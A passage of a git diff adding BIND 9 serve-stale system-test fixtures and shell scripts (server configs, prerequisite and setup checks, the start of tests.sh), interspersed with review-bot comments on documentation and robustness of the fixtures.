+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ recursion yes;
+ dump-file "named_dump3.db";
+};
+
+zone "." {
+ type secondary;
+ primaries { 10.53.0.1; };
+ file "root.bk";
+};
diff --git a/bin/tests/system/serve-stale/ns3/named2.conf.in b/bin/tests/system/serve-stale/ns3/named2.conf.in
new file mode 100644
index 0000000..a2b1d5a
--- /dev/null
+++ b/bin/tests/system/serve-stale/ns3/named2.conf.in
@@ -0,0 +1,51 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+/*
+ * Test default stale-answer-client-timeout value
+ */
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ dnssec-validation no;
+ recursion yes;
+ stale-answer-enable yes;
+ stale-cache-enable yes;
+ stale-answer-ttl 3;
+ stale-refresh-time 0;
+ stale-answer-client-timeout 1800;
+ recursive-clients 10; # CVE-2022-3924
+ max-stale-ttl 3600;
+ resolver-query-timeout 10;
+ qname-minimization disabled;
+};
+
+zone "." {
+ type hint;
+ file "root.db";
+};
diff --git a/bin/tests/system/serve-stale/ns3/named3.conf.in b/bin/tests/system/serve-stale/ns3/named3.conf.in
new file mode 100644
index 0000000..2d2a250
--- /dev/null
+++ b/bin/tests/system/serve-stale/ns3/named3.conf.in
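Review bot: The trailing comment on `recursive-clients 10; # CVE-2022-3924` in serve-stale/ns3/named2.conf.in gives only an identifier, and ns3/named4.conf.in sets the same limit with no comment at all. A reader cannot tell from the hunk why the quota is this low or which test depends on it. I would spell it out, for example `recursive-clients 10; # low quota so the serve-stale test can reach the limit (regression test for CVE-2022-3924)`, assuming that is the intent. The same comment belongs in named4.conf.in if that file serves the same test.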
@@ -0,0 +1,48 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+/*
+ * Test disable of stale-answer-client-timeout.
+ */
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ dnssec-validation no;
+ recursion yes;
+ stale-answer-enable yes;
+ stale-cache-enable yes;
+ stale-answer-ttl 3;
+ stale-refresh-time 0;
+ max-stale-ttl 3600;
+ resolver-query-timeout 10;
+};
+
+zone "." {
+ type hint;
+ file "root.db";
+};
diff --git a/bin/tests/system/serve-stale/ns3/named4.conf.in b/bin/tests/system/serve-stale/ns3/named4.conf.in
new file mode 100644
index 0000000..d04b3aa
--- /dev/null
+++ b/bin/tests/system/serve-stale/ns3/named4.conf.in
@@ -0,0 +1,50 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+/*
+ * Test stale-answer-client-timeout 0.
+ */
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ dnssec-validation no;
+ recursion yes;
+ stale-answer-enable yes;
+ stale-cache-enable yes;
+ stale-answer-ttl 3;
+ stale-answer-client-timeout 0;
+ stale-refresh-time 0;
+ resolver-query-timeout 10;
+ max-stale-ttl 3600;
+ recursive-clients 10;
+};
+
+zone "." {
+ type hint;
+ file "root.db";
+};
diff --git a/bin/tests/system/serve-stale/ns3/named5.conf.in b/bin/tests/system/serve-stale/ns3/named5.conf.in
new file mode 100644
index 0000000..35399b8
--- /dev/null
+++ b/bin/tests/system/serve-stale/ns3/named5.conf.in
@@ -0,0 +1,49 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+/*
+ * Test stale-answer-client-timeout 0.
+ */
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ dnssec-validation no;
+ recursion yes;
+ stale-answer-enable yes;
+ stale-cache-enable yes;
+ stale-answer-ttl 3;
+ stale-answer-client-timeout 0;
+ stale-refresh-time 4;
+ resolver-query-timeout 10;
+ max-stale-ttl 3600;
+};
+
+zone "." {
+ type hint;
+ file "root.db";
+};
diff --git a/bin/tests/system/serve-stale/ns3/named6.conf.in b/bin/tests/system/serve-stale/ns3/named6.conf.in
new file mode 100644
index 0000000..6e468d5
--- /dev/null
+++ b/bin/tests/system/serve-stale/ns3/named6.conf.in
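Review bot: The header comment of ns3/named5.conf.in is word for word the one in named4.conf.in (`Test stale-answer-client-timeout 0.`), although the two fixtures differ: named5 sets `stale-refresh-time 4` where named4 sets `0`, and it drops `recursive-clients 10`. A reader cannot tell from the comment which scenario each file backs. I would change the named5 line to ` * Test stale-answer-client-timeout 0 together with stale-refresh-time 4.`, and say in named4 why `recursive-clients 10` is there.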
@@ -0,0 +1,46 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ dnssec-validation no;
+ recursion yes;
+ stale-answer-enable no;
+ stale-cache-enable yes;
+ stale-answer-ttl 3;
+ stale-refresh-time 4;
+ resolver-query-timeout 10;
+ fetches-per-zone 1 fail;
+ fetches-per-server 1 fail;
+ max-stale-ttl 3600;
+};
+
+zone "." {
+ type hint;
+ file "root.db";
+};
diff --git a/bin/tests/system/serve-stale/ns3/named7.conf.in b/bin/tests/system/serve-stale/ns3/named7.conf.in
new file mode 100644
index 0000000..3e05341
--- /dev/null
+++ b/bin/tests/system/serve-stale/ns3/named7.conf.in
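Review bot: ns3/named6.conf.in has no comment saying which scenario it backs, unlike named3, named4, named5 and named7, and named8.conf.in has the same gap. Its distinguishing settings are `stale-answer-enable no` with `stale-cache-enable yes` and `fetches-per-zone 1 fail` / `fetches-per-server 1 fail`, so it presumably covers the fetch-limit interaction with stale answers off in the configuration. I would add a short block comment after the licence header stating that, in the same form as the one in named7.conf.in, once the author confirms the intent.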
@@ -0,0 +1,55 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+/*
+ * Test serve-stale interaction with fetch-limits (dual-mode).
+ */
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ dnssec-validation no;
+ recursion yes;
+ /*
+ * stale-answer-enable is not strictly required because serving
+ * stale answers is enabled in the test via rndc.
+ */
+ stale-answer-enable yes;
+ stale-cache-enable yes;
+ stale-answer-ttl 3;
+ stale-refresh-time 4;
+ resolver-query-timeout 10;
+ fetches-per-zone 1 fail;
+ fetches-per-server 1 fail;
+ max-stale-ttl 3600;
+};
+
+zone "." {
+ type secondary;
+ primaries { 10.53.0.1; };
+ file "root.bk";
+};
diff --git a/bin/tests/system/serve-stale/ns3/named8.conf.in b/bin/tests/system/serve-stale/ns3/named8.conf.in
new file mode 100644
index 0000000..a292b5a
--- /dev/null
+++ b/bin/tests/system/serve-stale/ns3/named8.conf.in
@@ -0,0 +1,46 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ recursion yes;
+ stale-answer-enable yes;
+ stale-cache-enable yes;
+ stale-answer-client-timeout 1800;
+ prefetch 2 8;
+ dns64 2001:aaaa::/96 {
+ clients { any; };
+ mapped { any; };
+ };
+};
+
+zone "." {
+ type secondary;
+ primaries { 10.53.0.1; };
+ file "root.bk";
+};
diff --git a/bin/tests/system/serve-stale/ns3/root.db b/bin/tests/system/serve-stale/ns3/root.db
new file mode 100644
index 0000000..bbf039c
--- /dev/null
+++ b/bin/tests/system/serve-stale/ns3/root.db
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+. 300 NS ns.nil.
+ns.nil. 300 A 10.53.0.1
diff --git a/bin/tests/system/serve-stale/ns4/named.conf.in b/bin/tests/system/serve-stale/ns4/named.conf.in
new file mode 100644
index 0000000..13a6d1d
--- /dev/null
+++ b/bin/tests/system/serve-stale/ns4/named.conf.in
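Review bot: ns3/named8.conf.in omits the `dnssec-validation no;` line that named3.conf.in through named7.conf.in all set, so whether this resolver validates depends on the compiled-in default rather than on the fixture. ns4/ and ns5/named.conf.in omit it as well. If validation is meant to stay off here, I would make it explicit with `dnssec-validation no;` in the `options` block. If the default is wanted, a one-line comment saying so would stop the next reader from treating the difference as an oversight.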
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.4;
+ notify-source 10.53.0.4;
+ transfer-source 10.53.0.4;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.4; };
+ listen-on-v6 { none; };
+ recursion yes;
+ dump-file "named_dump.db";
+ stale-answer-enable no;
+};
+
+zone "." {
+ type secondary;
+ primaries { 10.53.0.1; };
+ file "root.bk";
+};
diff --git a/bin/tests/system/serve-stale/ns5/named.conf.in b/bin/tests/system/serve-stale/ns5/named.conf.in
new file mode 100644
index 0000000..9a6c444
--- /dev/null
+++ b/bin/tests/system/serve-stale/ns5/named.conf.in
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.5;
+ notify-source 10.53.0.5;
+ transfer-source 10.53.0.5;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.5; };
+ listen-on-v6 { none; };
+ recursion yes;
+ dump-file "named_dump.db";
+ stale-answer-enable yes;
+ stale-cache-enable no;
+ max-cache-ttl 24h;
+};
+
+zone "." {
+ type secondary;
+ masters { 10.53.0.1; };
+ file "root.bk";
+};
diff --git a/bin/tests/system/serve-stale/prereq.sh b/bin/tests/system/serve-stale/prereq.sh
new file mode 100644
index 0000000..b42a5ed
--- /dev/null
+++ b/bin/tests/system/serve-stale/prereq.sh
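Review bot: The root zone in ns5/named.conf.in is declared with `type secondary;` but lists its source with the older keyword `masters { 10.53.0.1; };`, while ns3/named7.conf.in, ns3/named8.conf.in and ns4/named.conf.in use `primaries` for the same statement. Mixing both spellings inside one zone block reads like a missed rename. Unless this fixture is deliberately exercising the legacy synonym, I would write `primaries { 10.53.0.1; };` here too.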
@@ -0,0 +1,43 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+if $PERL -e 'use Net::DNS;' 2>/dev/null
+then
+ if $PERL -e 'use Net::DNS; die if ($Net::DNS::VERSION >= 0.69 && $Net::DNS::VERSION <= 0.74);' 2>/dev/null
+ then
+ :
+ else
+ echo_i "Net::DNS versions 0.69 to 0.74 have bugs that cause this test to fail: please update." >&2
+ exit 1
+ fi
+else
+ echo_i "This test requires the Net::DNS library." >&2
+ exit 1
+fi
+if $PERL -e 'use Net::DNS::Nameserver;' 2>/dev/null
+then
+ :
+else
+ echo_i "This test requires the Net::DNS::Nameserver library." >&2
+ exit 1
+fi
+if $PERL -e 'use Time::HiRes;' 2>/dev/null
+then
+ :
+else
+ echo_i "This test requires the Time::HiRes library." >&2
+ exit 1
+fi
diff --git a/bin/tests/system/serve-stale/setup.sh b/bin/tests/system/serve-stale/setup.sh
new file mode 100644
index 0000000..7441e0c
--- /dev/null
+++ b/bin/tests/system/serve-stale/setup.sh
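Review bot: Every probe in prereq.sh runs `$PERL -e ...` unquoted with `2>/dev/null`, so an empty or unset `PERL` fails the first test and is reported as "This test requires the Net::DNS library." although the interpreter is what is missing. The test is still skipped, but the message sends the operator after the wrong dependency. A guard before the first `if`, such as `[ -n "$PERL" ] || { echo_i "This test requires Perl." >&2; exit 1; }`, would separate the two cases. conf.sh is not part of this hunk, so this only matters if it can leave `PERL` empty.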
@@ -0,0 +1,22 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+$SHELL clean.sh
+
+copy_setports ns1/named1.conf.in ns1/named.conf
+copy_setports ns3/named1.conf.in ns3/named.conf
+copy_setports ns4/named.conf.in ns4/named.conf
+copy_setports ns5/named.conf.in ns5/named.conf
diff --git a/bin/tests/system/serve-stale/tests.sh b/bin/tests/system/serve-stale/tests.sh
new file mode 100755
index 0000000..d4a52e6
--- /dev/null
+++ b/bin/tests/system/serve-stale/tests.sh
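Review bot: Nothing in setup.sh checks the result of `$SHELL clean.sh` or of the first three `copy_setports` calls, so the script's exit status reflects only the last copy. A missing template for ns1, ns3 or ns4 would then go unnoticed, and those servers could start on a stale or absent named.conf. Adding `set -e` on the line after `. $SYSTEMTESTTOP/conf.sh` would stop at the first failure. `copy_setports` is defined outside this hunk, so confirm it returns non-zero when the substitution or copy fails.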
@@ -0,0 +1,2621 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +RNDCCMD="$RNDC -c ../common/rndc.conf -p ${CONTROLPORT} -s" +DIG="$DIG +time=11" + +max_stale_ttl=$(sed -ne 's,^[[:space:]]*max-stale-ttl \([[:digit:]]*\).*,\1,p' $TOP_SRCDIR/bin/named/config.c) +stale_answer_ttl=$(sed -ne 's,^[[:space:]]*stale-answer-ttl \([[:digit:]]*\).*,\1,p' $TOP_SRCDIR/bin/named/config.c) + +status=0 +n=0 + +# +# First test server with serve-stale options set. +# +echo_i "test server with serve-stale options set" + +n=$((n+1)) +echo_i "prime cache longttl.example TXT ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.1 longttl.example TXT > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache data.example TXT ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.1 data.example TXT > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache othertype.example CAA ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.1 othertype.example CAA > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache nodata.example TXT ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.1 nodata.example 
TXT > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache nxdomain.example TXT ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.1 nxdomain.example TXT > dig.out.test$n +grep "status: NXDOMAIN" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "verify prime cache statistics ($n)" +ret=0 +rm -f ns1/named.stats +$RNDCCMD 10.53.0.1 stats > /dev/null 2>&1 +[ -f ns1/named.stats ] || ret=1 +cp ns1/named.stats ns1/named.stats.$n +# Check first 10 lines of Cache DB statistics. After prime queries, we expect +# two active TXT, one active Others, one nxrrset TXT, and one NXDOMAIN. +grep -A 10 "++ Cache DB RRsets ++" ns1/named.stats.$n > ns1/named.stats.$n.cachedb || ret=1 +grep "1 Others" ns1/named.stats.$n.cachedb > /dev/null || ret=1 +grep "2 TXT" ns1/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 !TXT" ns1/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 NXDOMAIN" ns1/named.stats.$n.cachedb > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "disable responses from authoritative server ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.2 txt disable > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"0\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check 'rndc serve-stale status' ($n)" +ret=0 +$RNDCCMD 10.53.0.1 serve-stale status > rndc.out.test$n 2>&1 || ret=1 +grep '_default: on (stale-answer-ttl=4 max-stale-ttl=3600 stale-refresh-time=30)' rndc.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +sleep 2 + +# Run rndc dumpdb, test whether the stale data 
has correct comment printed. +# The max-stale-ttl is 3600 seconds, so the comment should say the data is +# stale for somewhere between 3500-3599 seconds. +echo_i "check rndc dump stale data.example ($n)" +rndc_dumpdb ns1 || ret=1 +awk '/; stale/ { x=$0; getline; print x, $0}' ns1/named_dump.db.test$n | + grep "; stale data\.example.*3[56]...*TXT.*A text record with a 2 second ttl" > /dev/null 2>&1 || ret=1 +# Also make sure the not expired data does not have a stale comment. +awk '/; answer/ { x=$0; getline; print x, $0}' ns1/named_dump.db.test$n | + grep "; answer longttl\.example.*[56]...*TXT.*A text record with a 600 second ttl" > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "sending queries for tests $((n+1))-$((n+4))..." +$DIG -p ${PORT} @10.53.0.1 data.example TXT > dig.out.test$((n+1)) & +$DIG -p ${PORT} @10.53.0.1 longttl.example TXT > dig.out.test$((n+2)) & +$DIG -p ${PORT} @10.53.0.1 othertype.example CAA > dig.out.test$((n+3)) & +$DIG -p ${PORT} @10.53.0.1 nodata.example TXT > dig.out.test$((n+4)) & +$DIG -p ${PORT} @10.53.0.1 nxdomain.example TXT > dig.out.test$((n+5)) + +wait + +n=$((n+1)) +echo_i "check stale data.example TXT ($n)" +ret=0 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*4.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check non-stale longttl.example TXT ($n)" +ret=0 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "longttl\.example\..*59[0-9].*IN.*TXT.*A text record with a 600 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check stale othertype.example CAA ($n)" +ret=0 +grep "status: NOERROR" 
dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "othertype\.example\..*4.*IN.*CAA.*0.*issue" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check stale nodata.example TXT ($n)" +ret=0 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +grep "example\..*4.*IN.*SOA" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check stale nxdomain.example TXT ($n)" +ret=0 +grep "status: NXDOMAIN" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +grep "example\..*4.*IN.*SOA" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "verify stale cache statistics ($n)" +ret=0 +rm -f ns1/named.stats +$RNDCCMD 10.53.0.1 stats > /dev/null 2>&1 +[ -f ns1/named.stats ] || ret=1 +cp ns1/named.stats ns1/named.stats.$n +# Check first 10 lines of Cache DB statistics. After serve-stale queries, we +# expect one active TXT RRset, one stale TXT, one stale nxrrset TXT, and one +# stale NXDOMAIN. +grep -A 10 "++ Cache DB RRsets ++" ns1/named.stats.$n > ns1/named.stats.$n.cachedb || ret=1 +grep "1 TXT" ns1/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 #Others" ns1/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 #TXT" ns1/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 #!TXT" ns1/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 #NXDOMAIN" ns1/named.stats.$n.cachedb > /dev/null || ret=1 +status=$((status+ret)) +if [ $ret != 0 ]; then echo_i "failed"; fi + +# Test stale-refresh-time when serve-stale is enabled via configuration. +# Steps for testing stale-refresh-time option (default). +# 1. Prime cache data.example txt +# 2. Disable responses from authoritative server. +# 3. 
Sleep for TTL duration so rrset TTL expires (2 sec) +# 4. Query data.example +# 5. Check if response come from stale rrset (4 sec TTL) +# 6. Enable responses from authoritative server. +# 7. Query data.example +# 8. Check if response come from stale rrset, since the query +# is within stale-refresh-time window. +n=$((n+1)) +echo_i "check 'rndc serve-stale status' ($n)" +ret=0 +$RNDCCMD 10.53.0.1 serve-stale status > rndc.out.test$n 2>&1 || ret=1 +grep '_default: on (stale-answer-ttl=4 max-stale-ttl=3600 stale-refresh-time=30)' rndc.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Step 1-3 done above. + +# Step 4. +n=$((n+1)) +echo_i "sending query for test ($n)" +$DIG -p ${PORT} @10.53.0.1 data.example TXT > dig.out.test$n + +# Step 5. +echo_i "check stale data.example TXT (stale-refresh-time) ($n)" +ret=0 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*4.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Step 6. +n=$((n+1)) +echo_i "enable responses from authoritative server ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.2 txt enable > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then 